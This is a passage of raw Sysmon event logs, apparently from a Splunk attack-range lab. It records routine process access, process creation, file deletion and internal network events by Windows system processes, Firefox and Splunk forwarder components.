11:30:20.921{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299966Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:20.921{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299965Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:20.921{C8EA50B7-F11C-6215-0500-000000003802}412428C:\Windows\system32\csrss.exe{C8EA50B7-1ACC-6216-9207-000000003802}4888C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000299964Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:20.921{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-1ACC-6216-9207-000000003802}4888C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000299963Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:20.922{C8EA50B7-1ACC-6216-9207-000000003802}4888C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000299962Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:20.489{C8EA50B7-1ACC-6216-9107-000000003802}56364936C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299961Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:20.252{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-1ACC-6216-9107-000000003802}5636C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299960Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:20.252{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299959Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:20.252{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299958Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:20.252{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299957Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:20.252{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299956Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:20.252{C8EA50B7-F11C-6215-0500-000000003802}412428C:\Windows\system32\csrss.exe{C8EA50B7-1ACC-6216-9107-000000003802}5636C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000299955Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:20.252{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-1ACC-6216-9107-000000003802}5636C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000299954Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:20.254{C8EA50B7-1ACC-6216-9107-000000003802}5636C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000299953Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:20.136{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BA8E1D158E635FBF41300FC4099CB85E,SHA256=654EB367EC72FD1547D4D87802FA8DA53B11C2B8145BD8215D1C5B3E00DD1037,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223727Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:21.963{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4737B4C0C2B76B9B1DACF1A17B6888F7,SHA256=04AA9B60136E19E9F8D1C89EBAB0425DB028B277A9802F6327619F658E9FC919,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299971Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:21.167{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8053409051D95B87DAA332E3247BDA05,SHA256=BC61218E05E2F801B27090AA0B2EB292EF6A097D3D40F201359A2D672A5AF43E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223728Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:22.978{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D25EFC8F0DB6CBBFD077EC14449CD52C,SHA256=904871430A84013B01A686240EE9AB307C282AE5019E199B219C6FBE21A650D3,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000299975Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:22.452{C8EA50B7-F2AD-6215-C000-000000003802}48564964C:\Windows\Explorer.EXE{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+55bd0|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9824|UNKNOWN(FFFFF8036DEEEFD8)|UNKNOWN(FFFFEA43A72A5B68)|UNKNOWN(FFFFEA43A72A5CE7)|UNKNOWN(FFFFEA43A72A0371)|UNKNOWN(FFFFEA43A72A1D3A)|UNKNOWN(FFFFEA43A729FFF6)|UNKNOWN(FFFFF8036DC06503)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+5942b|C:\Windows\System32\SHELL32.dll+dac8a|C:\Windows\System32\SHCORE.dll+33fad 10341000x8000000000000000299974Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:22.437{C8EA50B7-F2AD-6215-C000-000000003802}48564964C:\Windows\Explorer.EXE{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+556b1|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9824|UNKNOWN(FFFFF8036DEEEFD8)|UNKNOWN(FFFFEA43A72A5B68)|UNKNOWN(FFFFEA43A72A5CE7)|UNKNOWN(FFFFEA43A72A0371)|UNKNOWN(FFFFEA43A72A1D3A)|UNKNOWN(FFFFEA43A729FFF6)|UNKNOWN(FFFFF8036DC06503)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+5942b|C:\Windows\System32\SHELL32.dll+dac8a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000299973Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:22.437{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6824f4a902c78fbd.customDestinations-ms~RFa2f549.TMPMD5=C788ACA089D90F3A1A6EC3105767DB64,SHA256=342A88EE39B2F3B46C5FF775B5CA8B205D1F4E2D15CC4151DC918B0596F20C38,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299972Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:22.168{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9FB0E5803F292883A2B585D2FB4B8001,SHA256=CA6E0FF51F276F5DA7731E611C8F8B690084C96EEE3CF4F6BCA0392C5060E536,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223729Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:23.993{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0E817C0716B16B7133076664806302A9,SHA256=A52F6DB361ACE2F812684327E4E006309A1FF51622B69A57A84301A36A39A838,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299977Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:23.189{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=67EDE1BCC40CCFB5D5E7C313C1B01A73,SHA256=C9D2A5285816E4B8B1816AE54523F0B08E3B137419B8E658A36F92FDAF521446,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000299976Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:20.642{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49678-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000299978Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:24.204{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2BB6DD12D40FEA80B374A619BE533EA8,SHA256=E1EE0254E440F8CB332838A413CF964107C6A7AF662742AB333CBF898A34618B,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000223730Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:21.545{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51807-false10.0.1.12-8000- 23542300x8000000000000000299979Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:25.210{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BFEBD540451EF1E684AF60DAA41F419A,SHA256=EE4BC59DA96942019D77A82993C8D4B44074F0B64A660B087348EFF343B4E46C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223731Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:25.009{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=438BD0810FA7E4EEC9F1D7FDAF1C7FD6,SHA256=05FDCA76073FC1DC0BB602850546F4AD1C626C706577DEA52A28B83E0B7EF0A8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299980Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:26.240{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0C51EAAFDCE9C0391384149C2BF3A61A,SHA256=39B2B75D071F43877BB057F84E23EABF602BE6E84E72DD6D586D38B49E00490E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223732Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:26.025{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=480E085EB7B8EC9AFCFA745F6DEFF702,SHA256=CE95454D0A6EA3587A2D6586911F9F1C3C41AD9DD5B6E35B6380A6CEB96A4132,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299981Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:27.271{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C7CE5F9834CF16FE63FFB0C3C6D2AC77,SHA256=683051D45B717D0D7B167C6313018B110E0A089F190A7CFB77B9BF0E93745B06,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223733Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:27.040{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0E37484129D8452E7D22EE34CA31DE70,SHA256=6ED91952CD8E8F2EA100D69BF570A7CAAA0A1A9972F7AE7E82223020BFBAB18A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299982Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:28.272{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B7A4F9175133361DCB89C51F4ABEE8BA,SHA256=4952AC49AC2CB5137429769C8DC4644E55C54F3BFE3CD6C2BA78FD940883BDAE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223734Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:28.056{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3CEB687F63712C19E14AFF332580F6FB,SHA256=A94869B978370E8D1B70B40F271CEA4C058AFC55276EFFC508D8B072EE6BD325,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299984Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:29.291{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=412FA0E630A11D83F6A7C05C8DC51C78,SHA256=54A0AEB7F29F112B839ADCD5067FDEA6846510990F55EDB600548CA9F5F58E3E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223735Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 